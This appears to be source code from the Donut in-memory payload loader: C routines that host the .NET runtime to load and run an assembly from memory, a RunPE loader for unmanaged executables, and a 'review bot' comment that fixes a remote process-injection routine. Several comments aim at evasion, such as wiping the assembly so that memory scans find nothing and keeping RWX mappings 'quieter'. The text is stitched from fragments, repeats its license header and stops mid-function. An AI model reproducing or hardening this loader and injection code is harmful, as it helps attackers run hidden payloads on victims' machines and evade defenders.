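Review bot: `injectPIC` (lines 129-181) never checks the results it depends on — `GetProcAddress` for `RtlCreateUserThread` at line 142, `VirtualAllocEx` at line 152 and `WriteProcessMemory` at line 157 can all fail, after which the code calls through a NULL function pointer or writes to and starts a thread at address NULL in the target. The thread handle `ht` is also waited on and closed at lines 169-172 even when the returned NTSTATUS indicates failure and `ht` was never written. `VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT)` at line 176 is an invalid combination — `MEM_RELEASE` requires `dwSize == 0` and cannot be OR-ed with `MEM_DECOMMIT` — so the region is silently left behind in the target; it should read `VirtualFreeEx(hp, cs, 0, MEM_RELEASE);`. `EnablePrivilege` (line 76) likewise treats `AdjustTokenPrivileges` returning TRUE as success, although it returns TRUE with `GetLastError() == ERROR_NOT_ALL_ASSIGNED` when the privilege is absent from the token, so the "cannot enable SeDebugPrivilege" message in `main` never fires in that case; check `GetLastError() == ERROR_SUCCESS` after the call. The rewrite below adds the checks and allocates the region read-write, relying on the existing `VirtualProtectEx` at line 158 to make it execute-read once the payload is written.
```c
// … unchanged: resolve ntdll!RtlCreateUserThread, OpenProcess …
if(hp == NULL || pRtlCreateUserThread == NULL) {
    if(hp != NULL) CloseHandle(hp);
    return FALSE;
}

// allocate RW first; VirtualProtectEx below flips it to RX after the write
cs=VirtualAllocEx(hp, NULL, codeLen,
    MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if(cs == NULL) { CloseHandle(hp); return FALSE; }

if(!WriteProcessMemory(hp, cs, code, codeLen, &wr) || wr != codeLen ||
   !VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t)) {
    VirtualFreeEx(hp, cs, 0, MEM_RELEASE);
    CloseHandle(hp);
    return FALSE;
}

// … unchanged: getchar() pause, RtlCreateUserThread call …
if(nt == 0) {                      // STATUS_SUCCESS: ht is valid only now
    WaitForSingleObject(ht, INFINITE);
    CloseHandle(ht);
}

// MEM_RELEASE must be passed alone with dwSize == 0
VirtualFreeEx(hp, cs, 0, MEM_RELEASE);
CloseHandle(hp);
return nt == 0;
```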
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
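// Load the .NET assembly carried by the instance into a fresh AppDomain.
//
// Hosts the CLR in the current process, preferring CLRCreateInstance /
// ICLRMetaHost (runtime chosen by mod->runtime) and falling back to the
// legacy CorBindToRuntime, starts the host, creates the AppDomain named by
// mod->domain and hands the raw assembly bytes to AppDomain::Load_3.
//
// inst : decrypted DONUT_INSTANCE with its API table resolved
// pa   : receives the hosting interfaces; every field FreeAssembly releases
//        is reset to NULL on entry so a partial failure cleans up safely
// Returns TRUE only if Load_3 returned S_OK (pa->as then holds the Assembly).
//
// Fixes over the previous revision: hr started as S_OK, so when
// CLRCreateInstance was unavailable, or the requested runtime reported
// !IsLoadable, the CorBindToRuntime fallback was skipped and an unset
// pa->icrh was dereferenced at Start().
BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
    PDONUT_MODULE   mod;
    HRESULT         hr = E_FAIL;
    BSTR            domain;
    SAFEARRAYBOUND  sab;
    SAFEARRAY       *sa;
    DWORD           i;
    BOOL            loaded=FALSE, loadable=FALSE;
    PBYTE           p;

    // FreeAssembly releases whatever is non-NULL, so do not trust the
    // caller's stack contents.
    pa->icmh = NULL;
    pa->icri = NULL;
    pa->icrh = NULL;
    pa->iu   = NULL;
    pa->ad   = NULL;
    pa->as   = NULL;
    pa->mi   = NULL;
    pa->type = NULL;

    if(inst->type == DONUT_INSTANCE_PIC) {
      DPRINT("Using module embedded in instance");
      mod = (PDONUT_MODULE)&inst->module.x;
    } else {
      DPRINT("Loading module from allocated memory");
      mod = inst->module.p;
    }

    if(inst->api.CLRCreateInstance != NULL) {
      DPRINT("CLRCreateInstance");

      hr = inst->api.CLRCreateInstance(
       (REFCLSID)&inst->xCLSID_CLRMetaHost,
       (REFIID)&inst->xIID_ICLRMetaHost,
       (LPVOID*)&pa->icmh);

      if(SUCCEEDED(hr)) {
        DPRINT("ICLRMetaHost::GetRuntime(\"%ws\")", mod->runtime);

        hr = pa->icmh->lpVtbl->GetRuntime(
          pa->icmh, mod->runtime,
          (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);

        if(SUCCEEDED(hr)) {
          DPRINT("ICLRRuntimeInfo::IsLoadable");
          hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);

          if(SUCCEEDED(hr) && loadable) {
            DPRINT("ICLRRuntimeInfo::GetInterface");

            hr = pa->icri->lpVtbl->GetInterface(
              pa->icri,
              (REFCLSID)&inst->xCLSID_CorRuntimeHost,
              (REFIID)&inst->xIID_ICorRuntimeHost,
              (LPVOID)&pa->icrh);

            DPRINT("HRESULT: %08lx", hr);
          } else if(SUCCEEDED(hr)) {
            // Runtime exists but cannot be loaded into this process; force
            // the legacy path rather than continuing with hr == S_OK.
            DPRINT("Runtime \"%ws\" is not loadable", mod->runtime);
            hr = E_FAIL;
          }
        } else pa->icri = NULL;
      } else pa->icmh = NULL;
    }

    // Fallback: no CLRCreateInstance export (pre-v4 mscoree) or the
    // meta-host chain failed before yielding an ICorRuntimeHost.
    if(FAILED(hr) || pa->icrh == NULL) {
      if(inst->api.CorBindToRuntime == NULL) {
        DPRINT("CorBindToRuntime unavailable");
        hr = E_FAIL;
      } else {
        DPRINT("CorBindToRuntime");

        hr = inst->api.CorBindToRuntime(
          NULL,  // load whatever's available
          NULL,  // load workstation build
          &inst->xCLSID_CorRuntimeHost,
          &inst->xIID_ICorRuntimeHost,
          (LPVOID*)&pa->icrh);

        DPRINT("HRESULT: %08lx", hr);
      }
    }

    if(FAILED(hr) || pa->icrh == NULL) {
      pa->icrh = NULL;
      return FALSE;
    }
    DPRINT("ICorRuntimeHost::Start");

    hr = pa->icrh->lpVtbl->Start(pa->icrh);

    if(SUCCEEDED(hr)) {
      domain = inst->api.SysAllocString(mod->domain);

      // a NULL BSTR would only fail inside CreateDomain; stop here instead
      if(domain == NULL) return FALSE;

      DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", mod->domain);

      hr = pa->icrh->lpVtbl->CreateDomain(
        pa->icrh, domain, NULL, &pa->iu);

      inst->api.SysFreeString(domain);

      if(SUCCEEDED(hr)) {
        DPRINT("IUnknown::QueryInterface");

        hr = pa->iu->lpVtbl->QueryInterface(
          pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);

        if(SUCCEEDED(hr)) {
          sab.lLbound   = 0;
          // cElements is a ULONG while mod->len is 64-bit; assemblies
          // anywhere near 4 GiB are not expected here.
          sab.cElements = mod->len;
          sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);

          if(sa != NULL) {
            DPRINT("Copying %" PRIi64 " bytes of assembly to safe array", mod->len);

            for(i=0, p=sa->pvData; i<mod->len; i++) {
              p[i] = mod->data[i];
            }

            DPRINT("AppDomain::Load_3");

            hr = pa->ad->lpVtbl->Load_3(
              pa->ad, sa, &pa->as);

            loaded = hr == S_OK;

            DPRINT("HRESULT : %08lx", hr);

            // The CLR now owns its own copy; scrub both the SAFEARRAY and
            // the instance's module bytes so no plaintext assembly remains
            // for a memory scan.
            DPRINT("Erasing assembly from memory");

            for(i=0, p=sa->pvData; i<mod->len; i++) {
              p[i] = mod->data[i] = 0;
            }

            DPRINT("SafeArrayDestroy");
            inst->api.SafeArrayDestroy(sa);
          }
        }
      }
    }
    return loaded;
}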
154 | ||
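// Execute the assembly loaded by LoadAssembly.
//
// EXE payloads: fetch Assembly::EntryPoint and call MethodInfo::Invoke_3,
// passing a string[] built from mod->param (or a single empty string when
// Main declares parameters but none were supplied).
// DLL payloads: resolve mod->cls via Assembly::GetType_2 and call the public
// static method mod->method through Type::InvokeMember_3 with mod->param as
// BSTR arguments.
//
// Returns FALSE only when the class-name BSTR cannot be allocated; the
// HRESULT of the invocation itself is logged, not propagated, so callers see
// TRUE even when Main or the method failed (kept for compatibility).
//
// Fixes over the previous revision: SafeArrayGetLBound/UBound results were
// ignored, every temporary BSTR handed to SafeArrayPutElement leaked (the
// array stores a copy), a failed PutElement kept looping on a NULL array,
// and the ParameterInfo array from GetParameters was never destroyed.
BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
    SAFEARRAY     *sav=NULL, *params=NULL;
    VARIANT       arg, ret, vtPsa, v1={0}, v2;
    DWORD         i;
    PDONUT_MODULE mod;
    HRESULT       hr = S_OK;
    BSTR          cls, method, tmp;
    ULONG         cnt = 0;
    OLECHAR       str[1]={0};
    LONG          ucnt = 0, lcnt = 0;

    // nothing to destroy unless the EXE path builds a string[] below
    vtPsa.vt     = VT_EMPTY;
    vtPsa.parray = NULL;

    if(inst->type == DONUT_INSTANCE_PIC) {
      DPRINT("Using module embedded in instance");
      mod = (PDONUT_MODULE)&inst->module.x;
    } else {
      DPRINT("Loading module from allocated memory");
      mod = inst->module.p;
    }

    DPRINT("Type is %s",
      mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");

    // if this is a program
    if(mod->type == DONUT_MODULE_NET_EXE) {
      // get the entrypoint
      DPRINT("MethodInfo::EntryPoint");
      hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);

      if(SUCCEEDED(hr)) {
        // get the parameters for entrypoint
        DPRINT("MethodInfo::GetParameters");
        hr = pa->mi->lpVtbl->GetParameters(pa->mi, &params);

        if(SUCCEEDED(hr)) {
          DPRINT("SafeArrayGetLBound");
          hr = inst->api.SafeArrayGetLBound(params, 1, &lcnt);

          if(SUCCEEDED(hr)) {
            DPRINT("SafeArrayGetUBound");
            hr = inst->api.SafeArrayGetUBound(params, 1, &ucnt);
          }
          // 0 for "static void Main()", 1 for "Main(string[] args)";
          // a failed bounds query is treated as "no parameters".
          cnt = SUCCEEDED(hr) ? (ULONG)(ucnt - lcnt + 1) : 0;
          DPRINT("Number of parameters for entrypoint : %i", cnt);

          // does Main require string[] args?
          if(cnt != 0) {
            // create a 1 dimensional array for Main parameters
            sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);

            if(sav != NULL) {
              // create 1 dimensional array for strings[] args
              vtPsa.vt = (VT_ARRAY | VT_BSTR);

              // if user specified their own parameters, add to string array
              if(mod->param_cnt != 0) {
                vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, mod->param_cnt);

                if(vtPsa.parray != NULL) {
                  // add each string parameter
                  for(i=0; i<mod->param_cnt; i++) {
                    DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i + 1));

                    // SafeArrayPutElement stores its own copy of a BSTR,
                    // so the temporary is released immediately.
                    tmp = inst->api.SysAllocString(mod->param[i]);
                    inst->api.SafeArrayPutElement(vtPsa.parray, &i, tmp);
                    inst->api.SysFreeString(tmp);
                  }
                }
              } else {
                DPRINT("Adding empty string for invoke_3");
                // add empty string to make it work
                vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);

                if(vtPsa.parray != NULL) {
                  i   = 0;
                  tmp = inst->api.SysAllocString(str);
                  inst->api.SafeArrayPutElement(vtPsa.parray, &i, tmp);
                  inst->api.SysFreeString(tmp);
                }
              }
              // add string array to list of parameters (the VARIANT is copied)
              i = 0;
              inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
            }
          }
          v1.vt    = VT_NULL;
          v1.plVal = NULL;

          DPRINT("MethodInfo::Invoke_3()\n");

          hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);

          DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
            hr, SUCCEEDED(hr) ? "Success" : "Failed");

          // NOTE(review): v2 (Main's return value) is never cleared. That is
          // harmless for void/int Main, but an object return would leak;
          // clearing it needs VariantClear, which this code does not resolve.
          if(vtPsa.parray != NULL) {
            inst->api.SafeArrayDestroy(vtPsa.parray);
          }
          if(sav != NULL) {
            inst->api.SafeArrayDestroy(sav);
          }
          // GetParameters handed us an array of ParameterInfo references
          inst->api.SafeArrayDestroy(params);
        }
      } else pa->mi = NULL;
    } else {
      DPRINT("SysAllocString(\"%ws\")", mod->cls);
      cls = inst->api.SysAllocString(mod->cls);
      if(cls == NULL) return FALSE;

      DPRINT("SysAllocString(\"%ws\")", mod->method);
      method = inst->api.SysAllocString(mod->method);

      if(method != NULL) {
        DPRINT("Assembly::GetType_2");
        hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);

        if(SUCCEEDED(hr)) {
          sav = NULL;
          if(mod->param_cnt != 0) {
            DPRINT("SafeArrayCreateVector(%li parameter(s))", mod->param_cnt);

            sav = inst->api.SafeArrayCreateVector(
              VT_VARIANT, 0, mod->param_cnt);

            if(sav != NULL) {
              for(i=0; i<mod->param_cnt; i++) {
                DPRINT("Adding \"%ws\" as parameter %i", mod->param[i], (i+1));

                V_BSTR(&arg) = inst->api.SysAllocString(mod->param[i]);
                V_VT(&arg)   = VT_BSTR;

                // the VARIANT is deep-copied into the array; free our BSTR
                hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
                inst->api.SysFreeString(V_BSTR(&arg));

                if(FAILED(hr)) {
                  DPRINT("SafeArrayPutElement failed.");
                  inst->api.SafeArrayDestroy(sav);
                  sav = NULL;
                  break;
                }
              }
            }
          }
          if(SUCCEEDED(hr)) {
            DPRINT("Calling Type::InvokeMember_3");

            hr = pa->type->lpVtbl->InvokeMember_3(
              pa->type,
              method,                     // name of method
              BindingFlags_InvokeMethod |
              BindingFlags_Static       |
              BindingFlags_Public,
              NULL,
              v1,                         // empty VARIANT
              sav,                        // arguments to method
              &ret);                      // return code from method

            DPRINT("Type::InvokeMember_3 : %08lx : %s",
              hr, SUCCEEDED(hr) ? "Success" : "Failed");

            // NOTE(review): `ret` is never cleared either (see EXE path).
            if(sav != NULL) {
              inst->api.SafeArrayDestroy(sav);
            }
          }
        }
        inst->api.SysFreeString(method);
      }
      inst->api.SysFreeString(cls);
    }
    return TRUE;
}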
310 | ||
// Release one COM interface pointer if set, log it, and NULL it out so a
// repeated FreeAssembly is a no-op.
#define DONUT_RELEASE(p, what)              \
    do {                                    \
      if((p) != NULL) {                     \
        DPRINT(what "::Release");           \
        (p)->lpVtbl->Release(p);            \
        (p) = NULL;                         \
      }                                     \
    } while(0)

// Tear down everything LoadAssembly/RunAssembly acquired, in reverse order
// of acquisition: reflection objects first, then the AppDomain, then the
// runtime host (stopped before its reference is dropped), then the
// meta-host objects.  `inst` is accepted for signature symmetry only.
VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
    DONUT_RELEASE(pa->type, "Type");
    DONUT_RELEASE(pa->mi,   "MethodInfo");
    DONUT_RELEASE(pa->as,   "Assembly");
    DONUT_RELEASE(pa->ad,   "AppDomain");
    DONUT_RELEASE(pa->iu,   "IUnknown");

    // Stop precedes Release, matching the original ordering.
    if(pa->icrh != NULL) {
      DPRINT("ICorRuntimeHost::Stop");
      pa->icrh->lpVtbl->Stop(pa->icrh);
    }
    DONUT_RELEASE(pa->icrh, "ICorRuntimeHost");
    DONUT_RELEASE(pa->icri, "ICLRRuntimeInfo");
    DONUT_RELEASE(pa->icmh, "ICLRMetaHost");
}

#undef DONUT_RELEASE
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
// The one relocation type RunPE applies: 64-bit absolute on x64, 32-bit
// absolute (HIGHLOW) on x86.  Any other non-ABSOLUTE entry aborts the load.
#ifdef _WIN64
#define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
#else
#define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
#endif

// One entry of an IMAGE_BASE_RELOCATION block: page offset and fixup type.
typedef struct _IMAGE_RELOC {
    WORD offset :12;
    WORD type :4;
} IMAGE_RELOC, *PIMAGE_RELOC;

// Entry points RunPE reaches directly: DllMain for DLL payloads, a void
// start routine for EXE payloads.
typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
typedef VOID (WINAPI *Start_t)(VOID);

// Signature of the position-independent stub in call_api_bin.h that
// forwards mod->param to an exported function.
typedef void (__cdecl *call_stub_t)(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
46 | ||
47 | // same as strcmp | |
// Byte-wise comparison of two NUL-terminated strings without the CRT.
// Returns 0 when equal, otherwise the difference of the first mismatching
// bytes taken as unsigned char (negative when s1 sorts first).
int xstrcmp(char *s1, char *s2) {
    unsigned char *a = (unsigned char *)s1;
    unsigned char *b = (unsigned char *)s2;

    for(;;) {
      // stop at the end of s1 or at the first differing byte
      if(*a == 0 || *a != *b) {
        return (int)*a - (int)*b;
      }
      a++;
      b++;
    }
}
52 | ||
53 | // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem.. | |
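// In-memory execution of the unmanaged PE carried in the instance.
//
// Maps the image into one RWX allocation (sections copied to their
// VirtualAddress), resolves imports with LoadLibraryA/GetProcAddress,
// applies DIR64/HIGHLOW base relocations and then either calls the exported
// mod->method through the call_api_bin stub, calls DllMain(DLL_PROCESS_ATTACH),
// or jumps to the EXE entry point.  The mapping is released on return.
//
// What this loader does NOT do (visible by absence): per-section page
// protections, TLS callbacks, delay-load imports, SEH registration.  An EXE
// that calls ExitProcess takes the host with it.
//
// Fixes over the previous revision: a zero import or relocation directory
// RVA was dereferenced as if it pointed at a table (walking the DOS header),
// a failed LoadLibraryA left NULL IAT slots, sections were copied without
// bounds checks, and VirtualFree was called with MEM_DECOMMIT|MEM_RELEASE,
// which the API rejects, so the RWX image was never unmapped.
//
// inst : decrypted DONUT_INSTANCE; inst->module.{x,p} holds the PE bytes
VOID RunPE(PDONUT_INSTANCE inst) {
    PIMAGE_DOS_HEADER           dos, doshost;
    PIMAGE_NT_HEADERS           nt, nthost;
    PIMAGE_SECTION_HEADER       sh;
    PIMAGE_THUNK_DATA           oft, ft;
    PIMAGE_IMPORT_BY_NAME       ibn;
    PIMAGE_IMPORT_DESCRIPTOR    imp;
    PIMAGE_EXPORT_DIRECTORY     exp;
    PIMAGE_RELOC                list;
    PIMAGE_BASE_RELOCATION      ibr;
    DWORD                       rva;
    PDWORD                      adr;
    PDWORD                      sym;
    PWORD                       ord;
    PBYTE                       ofs;
    PCHAR                       str, name;
    HMODULE                     dll;
    DllMain_t                   DllMain;    // DLL
    Start_t                     Start;      // EXE
    call_stub_t                 CallApi;    // DLL function
    LPVOID                      cs = NULL, base, host;
    DWORD                       i, cnt;
    PDONUT_MODULE               mod;
    FARPROC                     api=NULL;   // DLL export

    // CALL_API_BIN is declared here as a local so the stub bytes live on the
    // stack rather than in a data section (original note: "msvc sux").
    #include "call_api_bin.h"

    if(inst->type == DONUT_INSTANCE_PIC) {
      DPRINT("Using module embedded in instance");
      mod = (PDONUT_MODULE)&inst->module.x;
    } else {
      DPRINT("Loading module from allocated memory");
      mod = inst->module.p;
    }

    base = mod->data;
    dos  = (PIMAGE_DOS_HEADER)base;
    nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);

    // before doing anything. check compatibility between exe/dll and host process.
    host    = inst->api.GetModuleHandle(NULL);
    doshost = (PIMAGE_DOS_HEADER)host;
    nthost  = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);

    if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
      DPRINT("Host process and payload are not compatiable...cannot load.");
      return;
    }

    DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
      nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);

    // NOTE(review): a single RWX region holding a whole PE is a strong
    // memory-scanner signal; a RW map with per-section VirtualProtect would
    // be quieter but needs an API this function does not resolve.
    cs = inst->api.VirtualAlloc(
      NULL, nt->OptionalHeader.SizeOfImage + 4096,
      MEM_COMMIT | MEM_RESERVE,
      PAGE_EXECUTE_READWRITE);

    if(cs == NULL) return;

    DPRINT("Copying each section to RWX memory %p", cs);
    sh = IMAGE_FIRST_SECTION(nt);

    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      // A section that would write past the allocation or read past the
      // module must not turn into a heap overflow inside the host.
      if((ULONG64)sh[i].VirtualAddress + sh[i].SizeOfRawData > (ULONG64)nt->OptionalHeader.SizeOfImage + 4096 ||
         (ULONG64)sh[i].PointerToRawData + sh[i].SizeOfRawData > mod->len) {
        DPRINT("Section %i exceeds image or module bounds...cannot load.", i);
        goto pe_cleanup;
      }
      Memcpy((PBYTE)cs + sh[i].VirtualAddress,
          (PBYTE)base + sh[i].PointerToRawData,
          sh[i].SizeOfRawData);
    }

    DPRINT("Processing the Import Table");
    rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;

    // An image without imports has a zero directory RVA; RVA2VA(cs, 0)
    // would otherwise hand back the DOS header as a descriptor table.
    if(rva != 0) {
      imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);

      // For each DLL
      for (;imp->Name!=0; imp++) {
        name = RVA2VA(PCHAR, cs, imp->Name);

        DPRINT("Loading %s", name);
        dll = inst->api.LoadLibraryA(name);

        if(dll == NULL) {
          // Unresolved module would leave NULL IAT slots and crash the host
          // on first use; abort while the image is still inert.
          DPRINT("Unable to load %s...cannot load.", name);
          goto pe_cleanup;
        }

        // Resolve the API for this library
        oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
        ft  = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);

        // For each API
        for (;; oft++, ft++) {
          // No API left?
          if (oft->u1.AddressOfData == 0) break;

          PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;

          // Resolve by ordinal?
          if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
            *func = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
          } else {
            // Resolve by name
            ibn   = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
            *func = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
          }
        }
      }
    }

    DPRINT("Applying Relocations");
    rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
    ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;

    // Stripped relocations (rva == 0): nothing to fix up.  Such an image only
    // works if cs happens to equal its preferred base, which is not checked.
    if(rva != 0) {
      ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);

      while(ibr->VirtualAddress != 0) {
        // a block shorter than its own header would never advance the cursor
        if(ibr->SizeOfBlock < sizeof(IMAGE_BASE_RELOCATION)) {
          DPRINT("ERROR: Malformed relocation block.");
          goto pe_cleanup;
        }
        list = (PIMAGE_RELOC)(ibr + 1);

        while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
          if(list->type == IMAGE_REL_TYPE) {
            *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
          } else if(list->type != IMAGE_REL_BASED_ABSOLUTE) {
            DPRINT("ERROR: Unrecognized Relocation type %08lx.", (DWORD)list->type);
            goto pe_cleanup;
          }
          list++;
        }
        ibr = (PIMAGE_BASE_RELOCATION)list;
      }
    }

    if(mod->type == DONUT_MODULE_DLL) {
      // call exported api?
      if(mod->method[0] != 0) {
        DPRINT("Resolving address of %s", (char*)mod->method);

        rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;

        if(rva != 0) {
          exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
          cnt = exp->NumberOfNames;

          DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);

          if(cnt != 0) {
            adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
            sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
            ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);

            // linear search of the name table, last entry first
            do {
              str = RVA2VA(PCHAR, cs, sym[cnt-1]);
              if(!xstrcmp(str, (char*)mod->method)) {
                api = RVA2VA(FARPROC, cs, adr[ord[cnt-1]]);
                break;
              }
            } while (--cnt);

            if(api != NULL) {
              // The stub gets its own RWX page so it can be wiped and freed
              // independently of the image.
              CallApi = inst->api.VirtualAlloc(
                NULL,
                sizeof(CALL_API_BIN),
                MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE);

              if(CallApi != NULL) {
                DPRINT("Calling %s via code stub.", (char*)mod->method);
                Memcpy((void*)CallApi, (void*)CALL_API_BIN, sizeof(CALL_API_BIN));
                CallApi(api, mod->param_cnt, mod->param);
                DPRINT("Erasing code stub");
                Memset(CallApi, 0, sizeof(CALL_API_BIN));
                // MEM_RELEASE alone: VirtualFree rejects it combined with
                // MEM_DECOMMIT, which is what the old call passed.
                inst->api.VirtualFree(CallApi, 0, MEM_RELEASE);
              }
            } else {
              DPRINT("Unable to resolve API");
              goto pe_cleanup;
            }
          }
        } else {
          DPRINT("No export directory...cannot resolve %s", (char*)mod->method);
        }
      } else {
        DPRINT("Executing entrypoint of DLL\n\n");
        DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
        // NOTE(review): hinstDLL is the host's base, not cs.  A DLL that
        // uses hinstDLL to find its own image (resources, GetModuleFileName)
        // would look at the wrong module -- confirm this is intended.
        DllMain(host, DLL_PROCESS_ATTACH, NULL);
      }
    } else {
      // The problem with executing EXE files:
      // 1) They use subsystems either GUI or CUI
      // 2) They call ExitProcess ...will need to review support of this later.
      DPRINT("Executing entrypoint of EXE\n\n");
      Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
      Start();
    }
pe_cleanup:
    // if memory allocated
    if(cs != NULL) {
      // Wiping the image before release is still disabled, as in the
      // original; presumably because payload threads may still be running
      // in it -- TODO confirm before enabling:
      // Memset(cs, 0, nt->OptionalHeader.SizeOfImage);
      DPRINT("Releasing memory");
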